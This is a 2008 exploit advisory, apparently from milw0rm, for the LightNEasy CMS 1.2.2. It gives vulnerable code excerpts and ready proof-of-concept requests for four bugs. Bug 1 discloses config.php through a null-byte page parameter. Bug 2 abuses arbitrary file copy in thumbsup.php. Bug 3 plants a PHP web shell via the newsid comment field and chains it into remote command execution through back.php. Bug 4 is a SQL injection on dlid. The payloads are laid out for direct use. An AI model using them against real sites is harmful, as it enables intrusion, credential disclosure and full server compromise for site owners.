LightNEasy SQLite no database 1.2.2 Multiple Remote Vulnerabilities by h3m4n


   1    # Author:          __GiReX__
   2    # mySite:          girex.altervista.org
   3    # Date:            14/04/08
   4
   5    # CMS:             LightNEasy SQLite / no database <= 1.2.2
   6    # Site:            lightneasy.org
   7
   8    # Advisory:        Multiple Remote Vulnerabilities
   9
   10   # Need:           magic_quotes_gpc = Off for Bugs 1-3
   11                     magic_quotes_gpc = On or Off for the SQL Injections (Bug 4)
   12
   13   ######################################################################################
   14
   15   # Bug 1:          Remote File Disclosure
   16   # Affected:       SQLite / no database
   17
   18   # Dumps the contents of config.php into the HTML output (embedded like a comment)
   19   # Note: config.php does not exist in the SQLite version
   20
   21   # PoC:            [host]/[path]/LightNEasy.php?page=config.php%00
   22
   23   ######################################################################################
   24
   25   # Bug 2:          Arbitrary file copy and rename / Thumbsup v1.12
   26   # Affected:       SQLite / no database
   27
   28   # This vulnerability is in a third-party script by Gerd Tentler that is bundled
   29   # with LightNEasy by default
   30
   31   # Vuln Code:      LightNEasy/thumbsup.php
   32
   33   34.    if(isset($_REQUEST[’image’])) $image = $_REQUEST[’image’];
   34   37.    if(isset($_REQUEST[’cache_dir’])) $cache_dir = $_REQUEST[’cache_dir’];
   35
   36   407.   if($image) {
   37            if($fp = @fopen($image, ’rb’)) {      <==
   38              $size = filesize($image);           <==   Unfortunately filesize() does not accept remote files
   39              $data = fread($fp, $size);          <==
   40             fclose($fp);
   41
   42              $original = "$cache_dir/img_" . md5($image . $size);   <==
   43            }
   44              else $error = ’Could not open’;
   45   414.   }
   46
   47   451.   if(!file_exists($original)) {
   48                if($fp = @fopen($original, ’wb’)) {          <==
   49                  fwrite($fp, $data, strlen($data));         <==
   50                  fclose($fp);
   51   455.      }
   52

   53   # Note: config.php does not exist in the SQLite version
   54
   55   # PoC:            [host]/[path]/LightNEasy/thumbsup.php?image=../data/config.php&cache_dir=config.txt%00
   56
   57   # And then get file disclosure with:
   58
   59   # PoC:            [host]/[path]/LightNEasy/config.txt
   60
   61   ######################################################################################
   62
   63   # Bug 3:          Getting a Remote Command Execution
   64   # Affected:       SQLite / no database
   65
   66   # First, inject PHP code into comments.dat via $_POST['newsid'], which is not sanitized
   67
   68   # Vuln code:      LightNEasy/runtime.php
   69
   70   32.      if($_POST[’submit’]=="sendcomment") {
   71   ...
   72   42.      if(!$fp=fopen("data/comments.dat","a")) die ($langmessage[142]);
   73   43.         fwrite($fp,$_POST[’newsid’]."|".encode($_POST[’commentname’])."|".    <==
   74   44.         encode($_POST[’commentemail’])."|".time()."|".encode(stripslashes($_POST[’commentmessage’]))."||");
   75
   76
   77   # PoC:    Requires that the admin has created some news and that the news page exists (it may have a different name)
   78
   79            POST [host]/[path]/LightNEasy.php?page=news
   80            Content−Type: application/x−www−form−urlencoded
   81
   82            commentname=1&commentemail=1&commentmessage=1&secCode=[CAPTCHA CODE]
   83            &submit=sendcomment&newsid=<?php passthru($_GET[’cmd’]); ?>/*
   84
   85
   86   # Then create a file back.php with the trick of Bug 2
   87
   88   # PoC:            [host]/[path]/LightNEasy/thumbsup.php?image=../data/comments.dat&cache_dir=../back.php%00
   89
   90   # Finally send remote commands to back.php
   91
   92   # PoC:            [host]/[path]/back.php?cmd=ls
   93
   94   ######################################################################################
   95
   96   # Bug 4:          Multiple Remote SQL Injections
   97   # Affected:       SQLite
   98
   99   # Works with magic_quotes_gpc = On / Off
  100
  101
  102   # Vuln Code:      /LightNEasy/lightneasy.php
  103
  104   237.      if(isset($_GET[’dlid’])) {
  105              $result=dbquery("SELECT * FROM downloads WHERE reg=".$_GET[’dlid’]);
  106
  107
  108   # PoC:          [host]/[path]/index.php?dlid=−1 OR 1
  109
  110   # You can find other SQL injections yourself
  111
  112   ######################################################################################
  113
  114   # milw0rm.com [2008-04-15]



